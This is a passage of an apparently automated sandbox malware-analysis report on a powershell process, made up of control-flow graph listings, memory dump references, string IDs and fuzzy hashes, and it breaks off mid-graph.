                                                                                        • Opcode Fuzzy Hash: 60f3ebdf248549eee38ce15d958c4c5bce84993511875b31649dca4d169c117e
                                                                                        • Instruction Fuzzy Hash: 71C22074A00214CFEB54DB18C954B9AB7B2EF89704F54C1E9DA09AB341CB71EE82CF95
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2985468302.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_70c0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Li$Li$Li
                                                                                        • API String ID: 0-2591214326
                                                                                        • Opcode ID: fc09125292b4da69687c02a1babcc7fb3f63792701b35cab7c0b2857d39d0bb0
                                                                                        • Instruction ID: e6a388a3e100b4e267678b3d25a8291753c137fb45e44bb2159e472511bbf4b3
                                                                                        • Opcode Fuzzy Hash: fc09125292b4da69687c02a1babcc7fb3f63792701b35cab7c0b2857d39d0bb0
                                                                                        • Instruction Fuzzy Hash: 3E2233B0B1420ADFDB64CB69C4506AEBBE6AFC5310F24826ED545CB355DB32EC01CBA1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 636 6a7d665-6a7d66e 637 6a7d677-6a7d690 636->637 638 6a7d670 636->638 648 6a7d146-6a7d14c 637->648 649 6a7d696-6a7d69c 637->649 638->637 639 6a7d445-6a7d44d 638->639 640 6a7d572-6a7d573 638->640 641 6a7d452-6a7d458 638->641 642 6a7d3b1-6a7d3b2 638->642 643 6a7d4b0-6a7d4b7 638->643 644 6a7d5ce-6a7d60c 638->644 645 6a7d45d-6a7d47d 638->645 646 6a7d4aa-6a7d57b 638->646 647 6a7d4e9-6a7d56d 638->647 650 6a7d57d-6a7d581 639->650 640->644 653 6a7d59e-6a7d5a2 641->653 654 6a7d1e0-6a7d206 642->654 656 6a7d594-6a7d59c 643->656 657 6a7d4bd-6a7d4d6 643->657 685 6a7d616-6a7d61b 644->685 686 6a7d60e-6a7d614 644->686 707 6a7d483 call 6a7dad2 645->707 708 6a7d483 call 6a7da8a 645->708 709 6a7d483 call 6a7dad8 645->709 646->650 670 6a7d430-6a7d436 647->670 651 6a7d155-6a7d156 648->651 652 6a7d14e 648->652 649->648 650->647 669 6a7d587-6a7d58f 650->669 651->654 652->654 659 6a7d3b7-6a7d3d0 652->659 660 6a7d325-6a7d334 652->660 661 6a7d395-6a7d3a0 652->661 662 6a7d24f-6a7d25b 652->662 663 6a7d2de-6a7d2ea 652->663 664 6a7d17e-6a7d1ae 652->664 665 6a7d219-6a7d23c 652->665 666 6a7d2b9-6a7d2ba 652->666 653->644 672 6a7d5a4-6a7d5bb 653->672 654->648 668 6a7d20c-6a7d214 654->668 656->653 657->670 671 6a7d4dc-6a7d4e4 657->671 659->648 660->648 680 6a7d28f-6a7d29b 662->680 681 6a7d25d-6a7d27c 662->681 663->648 700 6a7d1b4-6a7d1cd 664->700 701 6a7d6ad-6a7d6d1 664->701 665->648 679 6a7d242-6a7d24a 665->679 666->663 668->648 669->670 676 6a7d43f-6a7d440 670->676 677 6a7d438 670->677 671->670 672->670 675 6a7d5c1-6a7d5c9 672->675 675->670 676->639 676->647 677->639 677->640 677->641 677->643 677->644 677->645 677->646 677->647 677->664 677->680 691 6a7d62f-6a7d633 677->691 692 6a7d2cc-6a7d2d9 677->692 679->648 682 6a7d2a2-6a7d2b4 680->682 683 6a7d29d 680->683 681->648 690 6a7d282-6a7d28a 681->690 682->648 683->682 693 6a7d620 685->693 694 6a7d61d-6a7d61e 685->694 686->685 688 6a7d489-6a7d4a8 688->670 690->648 691->662 695 6a7d639-6a7d652 691->695 692->648 693->691 694->693 695->648 699 6a7d658-6a7d660 695->699 699->648 700->648 704 6a7d1d3-6a7d1db 700->704 701->648 705 6a7d6d7-6a7d6df 701->705 704->648 705->648 707->688 708->688 709->688
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981421552.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$%$(
                                                                                        • API String ID: 0-669551591
                                                                                        • Opcode ID: 28ef1c0a20cbd05c5bbb32b97e443b24d6e601c380c94a16cc92bc1691506341
                                                                                        • Instruction ID: 048ed2fbd7757ce9099e83933f8706699e107f961e9a15c60185d7f38ac7dab4
                                                                                        • Opcode Fuzzy Hash: 28ef1c0a20cbd05c5bbb32b97e443b24d6e601c380c94a16cc92bc1691506341
                                                                                        • Instruction Fuzzy Hash: 89B1E4B0D14208CFEB94EF99D885B9EBBF2FF49318F1090A9E409AB240DB745985CF55

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 710 6a7d3fa-6a7d400 712 6a7d407-6a7d41e 710->712 713 6a7d402-6a7d405 710->713 714 6a7d430-6a7d436 712->714 715 6a7d420-6a7d428 712->715 713->712 717 6a7d43f-6a7d440 714->717 718 6a7d438 714->718 715->714 716 6a7d42a-6a7d42d 715->716 716->714 719 6a7d445-6a7d44d 717->719 720 6a7d4e9-6a7d56d 717->720 718->719 718->720 721 6a7d452-6a7d458 718->721 722 6a7d572-6a7d573 718->722 723 6a7d4b0-6a7d4b7 718->723 724 6a7d28f-6a7d29b 718->724 725 6a7d62f-6a7d633 718->725 726 6a7d5ce-6a7d60c 718->726 727 6a7d17e-6a7d1ae 718->727 728 6a7d45d-6a7d47d 718->728 729 6a7d2cc-6a7d2d9 718->729 730 6a7d4aa-6a7d57b 718->730 731 6a7d57d-6a7d581 719->731 720->714 734 6a7d59e-6a7d5a2 721->734 722->726 739 6a7d594-6a7d59c 723->739 740 6a7d4bd-6a7d4d6 723->740 732 6a7d2a2-6a7d2b4 724->732 733 6a7d29d 724->733 736 6a7d24f-6a7d25b 725->736 737 6a7d639-6a7d652 725->737 764 6a7d616-6a7d61b 726->764 765 6a7d60e-6a7d614 726->765 772 6a7d1b4-6a7d1cd 727->772 773 6a7d6ad-6a7d6d1 727->773 781 6a7d483 call 6a7dad2 728->781 782 6a7d483 call 6a7da8a 728->782 783 6a7d483 call 6a7dad8 728->783 735 6a7d146-6a7d14c 729->735 730->731 731->720 742 6a7d587-6a7d58f 731->742 732->735 733->732 734->726 743 6a7d5a4-6a7d5bb 734->743 744 6a7d155-6a7d156 735->744 745 6a7d14e 735->745 736->724 750 6a7d25d-6a7d27c 736->750 737->735 748 6a7d658-6a7d660 737->748 739->734 740->714 749 6a7d4dc-6a7d4e4 740->749 742->714 743->714 760 6a7d5c1-6a7d5c9 743->760 755 6a7d1e0-6a7d206 744->755 745->727 745->736 752 6a7d3b7-6a7d3d0 745->752 753 6a7d325-6a7d334 745->753 754 6a7d395-6a7d3a0 745->754 745->755 756 6a7d2de-6a7d2ea 745->756 757 6a7d219-6a7d23c 745->757 758 6a7d2b9-6a7d2ba 745->758 748->735 749->714 750->735 761 6a7d282-6a7d28a 750->761 752->735 753->735 755->735 768 6a7d20c-6a7d214 755->768 756->735 757->735 769 6a7d242-6a7d24a 757->769 758->756 760->714 761->735 770 6a7d620 764->770 771 6a7d61d-6a7d61e 764->771 765->764 767 6a7d489-6a7d4a8 767->716 768->735 769->735 770->725 771->770 772->735 776 6a7d1d3-6a7d1db 772->776 773->735 778 6a7d6d7-6a7d6df 773->778 776->735 778->735 781->767 782->767 783->767
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981421552.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$%$(
                                                                                        • API String ID: 0-669551591
                                                                                        • Opcode ID: 1685a1323ed8c83f268a95ae079b1b316ba0c79e31d8af1267371ebaf4defdbc
                                                                                        • Instruction ID: 1b4fbe55c75fdda3f965d70c300f97dfea2aed5d745d75fe8f0ae0c5b688f979
                                                                                        • Opcode Fuzzy Hash: 1685a1323ed8c83f268a95ae079b1b316ba0c79e31d8af1267371ebaf4defdbc
                                                                                        • Instruction Fuzzy Hash: 7EB1F3B0D14208CFEB94EF98D889B9EBBF1FF49308F1090A9E409AB241DB745985DF55

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 784 6a7d3e3-6a7d3e6 786 6a7d42a-6a7d42d 784->786 787 6a7d430-6a7d436 786->787 788 6a7d43f-6a7d440 787->788 789 6a7d438 787->789 790 6a7d445-6a7d44d 788->790 791 6a7d4e9-6a7d56d 788->791 789->790 789->791 792 6a7d452-6a7d458 789->792 793 6a7d572-6a7d573 789->793 794 6a7d4b0-6a7d4b7 789->794 795 6a7d28f-6a7d29b 789->795 796 6a7d62f-6a7d633 789->796 797 6a7d5ce-6a7d60c 789->797 798 6a7d17e-6a7d1ae 789->798 799 6a7d45d-6a7d47d 789->799 800 6a7d2cc-6a7d2d9 789->800 801 6a7d4aa-6a7d57b 789->801 802 6a7d57d-6a7d581 790->802 791->787 805 6a7d59e-6a7d5a2 792->805 793->797 810 6a7d594-6a7d59c 794->810 811 6a7d4bd-6a7d4d6 794->811 803 6a7d2a2-6a7d2b4 795->803 804 6a7d29d 795->804 807 6a7d24f-6a7d25b 796->807 808 6a7d639-6a7d652 796->808 835 6a7d616-6a7d61b 797->835 836 6a7d60e-6a7d614 797->836 843 6a7d1b4-6a7d1cd 798->843 844 6a7d6ad-6a7d6d1 798->844 852 6a7d483 call 6a7dad2 799->852 853 6a7d483 call 6a7da8a 799->853 854 6a7d483 call 6a7dad8 799->854 806 6a7d146-6a7d14c 800->806 801->802 802->791 813 6a7d587-6a7d58f 802->813 803->806 804->803 805->797 814 6a7d5a4-6a7d5bb 805->814 815 6a7d155-6a7d156 806->815 816 6a7d14e 806->816 807->795 821 6a7d25d-6a7d27c 807->821 808->806 819 6a7d658-6a7d660 808->819 810->805 811->787 820 6a7d4dc-6a7d4e4 811->820 813->787 814->787 831 6a7d5c1-6a7d5c9 814->831 826 6a7d1e0-6a7d206 815->826 816->798 816->807 823 6a7d3b7-6a7d3d0 816->823 824 6a7d325-6a7d334 816->824 825 6a7d395-6a7d3a0 816->825 816->826 827 6a7d2de-6a7d2ea 816->827 828 6a7d219-6a7d23c 816->828 829 6a7d2b9-6a7d2ba 816->829 819->806 820->787 821->806 832 6a7d282-6a7d28a 821->832 823->806 824->806 826->806 839 6a7d20c-6a7d214 826->839 827->806 828->806 840 6a7d242-6a7d24a 828->840 829->827 831->787 832->806 841 6a7d620 835->841 842 6a7d61d-6a7d61e 835->842 836->835 838 6a7d489-6a7d4a8 838->786 839->806 840->806 841->796 842->841 843->806 847 6a7d1d3-6a7d1db 843->847 844->806 849 6a7d6d7-6a7d6df 844->849 847->806 849->806 852->838 853->838 854->838
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981421552.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$%$(
                                                                                        • API String ID: 0-669551591
                                                                                        • Opcode ID: 101783c969f0f459563ba3adde415cebdfd2deb6f2b48e534a90f2c0476c3f9d
                                                                                        • Instruction ID: 17001699edbb828aca3c8db6a87e643d12959da95cedcd182584b56ff5973629
                                                                                        • Opcode Fuzzy Hash: 101783c969f0f459563ba3adde415cebdfd2deb6f2b48e534a90f2c0476c3f9d
                                                                                        • Instruction Fuzzy Hash: 1EB1F4B0D14208CFEB94EF98D889B9EBBF1EF49308F1090A9E409AB240DB745985DF55
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2985468302.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_70c0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ri$ri
                                                                                        • API String ID: 0-4124556447
                                                                                        • Opcode ID: 01f449992f9243d0ce158668db2e4d8b229aa9bc29e1902195973356605c5881
                                                                                        • Instruction ID: 28b082310a70cdc0f179f1cdad9537961102286282df6a2d296205d38b0cdbcc
                                                                                        • Opcode Fuzzy Hash: 01f449992f9243d0ce158668db2e4d8b229aa9bc29e1902195973356605c5881
                                                                                        • Instruction Fuzzy Hash: A24204B2B00206DFDB64DFA8C4106AEBBE7AFC5310F24816ED545CB251DB71E942C7A2

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1072 70c8310-70c8324 1074 70c830f 1072->1074 1075 70c8326-70c8328 1072->1075 1074->1072 1076 70c837d-70c8387 1075->1076 1077 70c832a-70c8352 1075->1077 1080 70c839f-70c83a6 1076->1080 1081 70c8389-70c838d 1076->1081 1078 70c8358-70c835d 1077->1078 1079 70c8b0b-70c8b33 1077->1079 1082 70c835f-70c8365 1078->1082 1083 70c8375-70c837c 1078->1083 1080->1079 1086 70c83ac-70c83b1 1080->1086 1084 70c838f 1081->1084 1085 70c83f8 1081->1085 1089 70c8369-70c8373 1082->1089 1090 70c8367 1082->1090 1083->1076 1083->1079 1093 70c8391 1084->1093 1094 70c8393-70c839d 1084->1094 1091 70c83f9-70c8418 1085->1091 1087 70c83c9 1086->1087 1088 70c83b3-70c83b9 1086->1088 1097 70c83cc-70c83d6 1087->1097 1095 70c83bd-70c83c7 1088->1095 1096 70c83bb 1088->1096 1089->1083 1090->1083 1098 70c841a-70c8444 1091->1098 1099 70c8447-70c8451 1091->1099 1093->1080 1094->1080 1095->1087 1096->1087 1097->1079 1101 70c83dc-70c83e1 1097->1101 1098->1099 1099->1079 1104 70c8457-70c845c 1099->1104 1101->1091 1107 70c83e3-70c83e9 1101->1107 1105 70c845e-70c8464 1104->1105 1106 70c8474-70c84a5 1104->1106 1110 70c8468-70c8472 1105->1110 1111 70c8466 1105->1111 1106->1079 1119 70c84ab-70c84b3 1106->1119 1112 70c83ed-70c83f7 1107->1112 1113 70c83eb 1107->1113 1110->1106 1111->1106 1112->1091 1113->1091 1120 70c84cb-70c84dd 1119->1120 1121 70c84b5-70c84bb 1119->1121 1120->1079 1124 70c84e3-70c84eb 1120->1124 1122 70c84bd 1121->1122 1123 70c84bf-70c84c9 1121->1123 1122->1120 1123->1120 1125 70c84ed-70c84f3 1124->1125 1126 70c8503-70c8515 1124->1126 1128 70c84f5 1125->1128 1129 70c84f7-70c8501 1125->1129 1126->1079 1130 70c851b-70c8520 1126->1130 1128->1126 1129->1126 1131 70c8538-70c8544 1130->1131 1132 70c8522-70c8528 1130->1132 1131->1079 1133 70c854a-70c8568 1131->1133 1135 70c852c-70c8536 1132->1135 1136 70c852a 1132->1136 1139 70c856a-70c8570 1133->1139 1140 70c8582-70c85cc 1133->1140 1135->1131 1136->1131 1141 70c8574-70c8580 1139->1141 1142 70c8572 1139->1142 1149 70c8af0-70c8afc 1140->1149 1150 70c85d2-70c8604 1140->1150 1141->1140 1142->1140 1153 70c862d-70c8637 1150->1153 1154 70c8606-70c8625 1150->1154 1155 70c863d-70c8642 1153->1155 1156 70c88b3-70c88e8 1153->1156 1154->1153 1158 70c865a-70c868b 1155->1158 1159 70c8644-70c864a 1155->1159 1187 70c89be-70c89d2 1156->1187 1158->1156 1164 70c8691-70c8699 1158->1164 1160 70c864c 1159->1160 1161 70c864e-70c8658 1159->1161 1160->1158 1161->1158 1167 70c869b-70c86a1 1164->1167 1168 70c86b1-70c86c3 1164->1168 1170 70c86a5-70c86af 1167->1170 1171 70c86a3 1167->1171 1168->1156 1172 70c86c9-70c86d1 1168->1172 1170->1168 1171->1168 1173 70c86e9-70c86fb 1172->1173 1174 70c86d3-70c86d9 1172->1174 1173->1156 1178 70c8701-70c8706 1173->1178 1176 70c86dd-70c86e7 1174->1176 1177 70c86db 1174->1177 1176->1173 1177->1173 1180 70c871e-70c872a 1178->1180 1181 70c8708-70c870e 1178->1181 1180->1156 1186 70c8730-70c8761 1180->1186 1184 70c8710 1181->1184 1185 70c8712-70c871c 1181->1185 1184->1180 1185->1180 1195 70c877b-70c87ed 1186->1195 1196 70c8763-70c8769 1186->1196 1188 70c89fb-70c8a24 1187->1188 1189 70c89d4-70c89f3 1187->1189 1188->1079 1197 70c8a2a-70c8a2f 1188->1197 1189->1188 1195->1156 1223 70c87f3-70c8814 1195->1223 1200 70c876d-70c8779 1196->1200 1201 70c876b 1196->1201 1198 70c8a47-70c8a56 1197->1198 1199 70c8a31-70c8a37 1197->1199 1198->1079 1204 70c8a5c-70c8a63 1198->1204 1202 70c8a39 1199->1202 1203 70c8a3b-70c8a45 1199->1203 1200->1195 1201->1195 1202->1198 1203->1198 1206 70c8a7b-70c8ad5 1204->1206 1207 70c8a65-70c8a6b 1204->1207 1224 70c8aeb 1206->1224 1225 70c8ad7-70c8ae6 1206->1225 1210 70c8a6d 1207->1210 1211 70c8a6f-70c8a79 1207->1211 1210->1206 1211->1206 1228 70c882e-70c8830 1223->1228 1229 70c8816-70c881c 1223->1229 1224->1097 1225->1097 1232 70c884a-70c888f 1228->1232 1233 70c8832-70c8838 1228->1233 1230 70c881e 1229->1230 1231 70c8820-70c882c 1229->1231 1230->1228 1231->1228 1232->1156 1242 70c8891-70c8894 1232->1242 1234 70c883c-70c8848 1233->1234 1235 70c883a 1233->1235 1234->1232 1235->1232 1243 70c889e-70c88a7 1242->1243 1244 70c88ae 1243->1244 1244->1187
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2985468302.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_70c0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (fi$(fi
                                                                                        • API String ID: 0-2143155470
                                                                                        • Opcode ID: 180d9ffc0e5f96eacadf97bdf3ff55a0c1a375411b01187e77a462157227f021
                                                                                        • Instruction ID: 11474c62b0d8023f3d7b766daf8f097387f50bf3b3853d5c42606fa067a1a32f
                                                                                        • Opcode Fuzzy Hash: 180d9ffc0e5f96eacadf97bdf3ff55a0c1a375411b01187e77a462157227f021
                                                                                        • Instruction Fuzzy Hash: 2A1259B4A00205DFDB64CB58C590A6EBBF2EF85704F28C26DE8159B395CB72EC42CB45

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1245 6a3fc2c-6a3fcc4 1248 6a3fcc6-6a3fcd1 1245->1248 1249 6a3fd0e-6a3fd10 1245->1249 1248->1249 1250 6a3fcd3-6a3fcdf 1248->1250 1251 6a3fd12-6a3fd2a 1249->1251 1252 6a3fd02-6a3fd0c 1250->1252 1253 6a3fce1-6a3fceb 1250->1253 1258 6a3fd74-6a3fd76 1251->1258 1259 6a3fd2c-6a3fd37 1251->1259 1252->1251 1254 6a3fcef-6a3fcfe 1253->1254 1255 6a3fced 1253->1255 1254->1254 1257 6a3fd00 1254->1257 1255->1254 1257->1252 1260 6a3fd78-6a3fd8a 1258->1260 1259->1258 1261 6a3fd39-6a3fd45 1259->1261 1268 6a3fd91-6a3fdbd 1260->1268 1262 6a3fd47-6a3fd51 1261->1262 1263 6a3fd68-6a3fd72 1261->1263 1265 6a3fd53 1262->1265 1266 6a3fd55-6a3fd64 1262->1266 1263->1260 1265->1266 1266->1266 1267 6a3fd66 1266->1267 1267->1263 1269 6a3fdc3-6a3fdd1 1268->1269 1270 6a3fdd3-6a3fdd9 1269->1270 1271 6a3fdda-6a3fe37 1269->1271 1270->1271 1278 6a3fe47-6a3fe4b 1271->1278 1279 6a3fe39-6a3fe3d 1271->1279 1281 6a3fe5b-6a3fe5f 1278->1281 1282 6a3fe4d-6a3fe51 1278->1282 1279->1278 1280 6a3fe3f 1279->1280 1280->1278 1284 6a3fe61-6a3fe65 1281->1284 1285 6a3fe6f-6a3fe73 1281->1285 1282->1281 1283 6a3fe53 1282->1283 1283->1281 1284->1285 1286 6a3fe67 1284->1286 1287 6a3fe83 1285->1287 1288 6a3fe75-6a3fe79 1285->1288 1286->1285 1290 6a3fe84 1287->1290 1288->1287 1289 6a3fe7b 1288->1289 1289->1287 1290->1290
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981102863.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a30000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \V|m$\V|m
                                                                                        • API String ID: 0-329693845
                                                                                        • Opcode ID: a0b2ea3ac29fb84e9c9534e147e17fedfc5b1139153e74c0799a4e9f0b9863b6
                                                                                        • Instruction ID: add47da379a0556f60b0f6f676e7a98e6181f95463d3d5ee33f58af5cc7bc9aa
                                                                                        • Opcode Fuzzy Hash: a0b2ea3ac29fb84e9c9534e147e17fedfc5b1139153e74c0799a4e9f0b9863b6
                                                                                        • Instruction Fuzzy Hash: E9715870E10319CFDF50EFA9C88579EBBF1AF88754F148129E419AB254EB749841CF91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1291 6a3fc38-6a3fcc4 1294 6a3fcc6-6a3fcd1 1291->1294 1295 6a3fd0e-6a3fd10 1291->1295 1294->1295 1296 6a3fcd3-6a3fcdf 1294->1296 1297 6a3fd12-6a3fd2a 1295->1297 1298 6a3fd02-6a3fd0c 1296->1298 1299 6a3fce1-6a3fceb 1296->1299 1304 6a3fd74-6a3fd76 1297->1304 1305 6a3fd2c-6a3fd37 1297->1305 1298->1297 1300 6a3fcef-6a3fcfe 1299->1300 1301 6a3fced 1299->1301 1300->1300 1303 6a3fd00 1300->1303 1301->1300 1303->1298 1306 6a3fd78-6a3fdbd 1304->1306 1305->1304 1307 6a3fd39-6a3fd45 1305->1307 1315 6a3fdc3-6a3fdd1 1306->1315 1308 6a3fd47-6a3fd51 1307->1308 1309 6a3fd68-6a3fd72 1307->1309 1311 6a3fd53 1308->1311 1312 6a3fd55-6a3fd64 1308->1312 1309->1306 1311->1312 1312->1312 1313 6a3fd66 1312->1313 1313->1309 1316 6a3fdd3-6a3fdd9 1315->1316 1317 6a3fdda-6a3fe37 1315->1317 1316->1317 1324 6a3fe47-6a3fe4b 1317->1324 1325 6a3fe39-6a3fe3d 1317->1325 1327 6a3fe5b-6a3fe5f 1324->1327 1328 6a3fe4d-6a3fe51 1324->1328 1325->1324 1326 6a3fe3f 1325->1326 1326->1324 1330 6a3fe61-6a3fe65 1327->1330 1331 6a3fe6f-6a3fe73 1327->1331 1328->1327 1329 6a3fe53 1328->1329 1329->1327 1330->1331 1332 6a3fe67 1330->1332 1333 6a3fe83 1331->1333 1334 6a3fe75-6a3fe79 1331->1334 1332->1331 1336 6a3fe84 1333->1336 1334->1333 1335 6a3fe7b 1334->1335 1335->1333 1336->1336
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981102863.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a30000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \V|m$\V|m
                                                                                        • API String ID: 0-329693845
                                                                                        • Opcode ID: a7bf5f40439a378261f169102cfda997326f1c9e21d573db1d13438c94f6e643
                                                                                        • Instruction ID: fb71d5412ba825051d80a525dbf21a39b0b1d71d1e92b52fb89b72aea8ef00d8
                                                                                        • Opcode Fuzzy Hash: a7bf5f40439a378261f169102cfda997326f1c9e21d573db1d13438c94f6e643
                                                                                        • Instruction Fuzzy Hash: 76715870E10319CFDF50EFA9C88579EBBF2AF88754F248129E419AB254EB749841CB81

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1337 6a7b540-6a7b547 1338 6a7b54d-6a7b54e 1337->1338 1339 6a772cc 1337->1339 1342 6a772d2 call 6a7cd30 1339->1342 1343 6a772d2 call 6a7cd40 1339->1343 1340 6a772d8-6a772f0 1340->1337 1342->1340 1343->1340
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981421552.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$b
                                                                                        • API String ID: 0-2454836988
                                                                                        • Opcode ID: 8515e8b0933399a92b3dccf846ff041e0fdd24bea5b2b5ad687377f851e5d55c
                                                                                        • Instruction ID: ceefcf52ce7b1f6c0f11b4feb9f7339fcc30a326ad398ea543671112ef6b621c
                                                                                        • Opcode Fuzzy Hash: 8515e8b0933399a92b3dccf846ff041e0fdd24bea5b2b5ad687377f851e5d55c
                                                                                        • Instruction Fuzzy Hash: 43E08C30904719CFDB61DF28CC84B9A7FB1EB02300F2061C8A00D67282CB301E89CF86

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1344 6f95654-6f9568b 1347 6f95691-6f956a3 1344->1347 1348 6f956ac-6f956d0 1347->1348 1349 6f956a5 1347->1349 1351 6f956ff-6f9576c 1348->1351 1352 6f956d2-6f956f7 1348->1352 1349->1348 1350 6f95773-6f95797 1349->1350 1353 6f95799-6f957be 1350->1353 1354 6f957c6-6f95803 1350->1354 1351->1350 1352->1351 1353->1354 1362 6f9580a-6f95817 1354->1362 1363 6f9581d-6f95850 1362->1363 1364 6f974b4-6f974fd 1362->1364 1368 6f9587f-6f9588c 1363->1368 1369 6f95852-6f95877 1363->1369 1364->1347 1368->1364 1371 6f95892-6f958e8 1368->1371 1369->1368 1371->1364 1377 6f958ee-6f9590c 1371->1377 1380 6f95916-6f95930 1377->1380 1608 6f95933 call 70c7808 1380->1608 1609 6f95933 call 70c7a60 1380->1609 1610 6f95933 call 70c77f2 1380->1610 1381 6f95935-6f95959 1384 6f9595f-6f9599a 1381->1384 1385 6f95f50-6f95f74 1381->1385 1393 6f959c9-6f959d6 1384->1393 1394 6f9599c-6f959c1 1384->1394 1386 6f95fa3-6f95fb0 1385->1386 1387 6f95f76-6f95f9b 1385->1387 1386->1364 1389 6f95fb6-6f96005 1386->1389 1387->1386 1402 6f9600b-6f9600d 1389->1402 1403 6f97502-6f975ba 1389->1403 1396 6f959dc-6f95a04 1393->1396 1397 6f95d44-6f95d8d 1393->1397 1394->1393 1396->1397 1404 6f95a0a-6f95a32 1396->1404 1440 6f95e2b-6f95e45 1397->1440 1405 6f96013-6f96025 1402->1405 1408 6f975e9-6f9761e 1403->1408 1409 6f975bc-6f975e1 1403->1409 1404->1397 1417 6f95a38-6f95a8e 1404->1417 1410 6f9602e-6f96052 1405->1410 1411 6f96027 1405->1411 1423 6f97709-6f9774d 1408->1423 1424 6f97624-6f97652 1408->1424 1409->1408 1414 6f96081-6f960e1 1410->1414 1415 6f96054-6f96079 1410->1415 1411->1410 1413 6f960e8-6f9610c 1411->1413 1420 6f9613b-6f96148 1413->1420 1421 6f9610e-6f96133 1413->1421 1414->1413 1415->1414 1417->1397 1438 6f95a94-6f95b2c 1417->1438 1427 6f9614e-6f9617c 1420->1427 1428 6f97464-6f974ad 1420->1428 1421->1420 1467 6f97752 1423->1467 1424->1423 1439 6f97658-6f976ca 1424->1439 1427->1428 1441 6f96182-6f961b0 1427->1441 1428->1405 1438->1397 1479 6f95b32-6f95bc6 1438->1479 1476 6f976f8-6f976fe 1439->1476 1477 6f976cc-6f976e7 1439->1477 1445 6f95e74-6f95ea9 1440->1445 1446 6f95e47-6f95e6c 1440->1446 1441->1428 1452 6f961b6-6f961e4 1441->1452 1445->1364 1456 6f95eaf-6f95ed3 1445->1456 1446->1445 1452->1428 1463 6f961ea-6f962c7 1452->1463 1456->1364 1468 6f95ed9-6f95f35 1456->1468 1498 6f9658d-6f965b1 1463->1498 1499 6f962cd-6f962e7 1463->1499 1467->1467 1491 6f95f4b 1468->1491 1492 6f95f37-6f95f46 1468->1492 1476->1423 1479->1440 1503 6f95bcc-6f95be6 1479->1503 1491->1362 1492->1362 1504 6f965e0-6f966f6 1498->1504 1505 6f965b3-6f965d8 1498->1505 1501 6f962e9-6f9630e 1499->1501 1502 6f96316-6f96323 1499->1502 1501->1502 1506 6f96329-6f9636d 1502->1506 1507 6f96544-6f96588 1502->1507 1508 6f95be8 1503->1508 1509 6f95bef-6f95c13 1503->1509 1552 6f96959-6f96987 1504->1552 1553 6f966fc-6f96716 1504->1553 1505->1504 1506->1507 1526 6f96373-6f96393 1506->1526 1507->1498 1508->1509 1513 6f95c9a-6f95cbe 1508->1513 1514 6f95d3f 1508->1514 1515 6f95c42-6f95c93 1509->1515 1516 6f95c15-6f95c3a 1509->1516 1513->1385 1518 6f95cc4-6f95cf1 1513->1518 1514->1440 1515->1513 1516->1515 1518->1385 1526->1507 1534 